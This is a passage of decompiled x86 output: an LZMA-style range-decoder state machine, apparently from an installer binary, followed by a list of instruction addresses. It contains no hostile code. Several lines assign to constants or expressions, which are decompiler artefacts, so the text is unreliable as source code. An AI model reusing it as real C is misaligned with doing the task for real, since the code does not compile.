												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406e9d
0x00406e9d
0x00406ea1
0x00406ec2
0x00406ec9
0x00406ecf
0x00406ed5
0x00406ee7
0x00406eed
0x00406ef2
0x00000000
0x00406ea3
0x00406ea9
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00406c05
0x00406c09
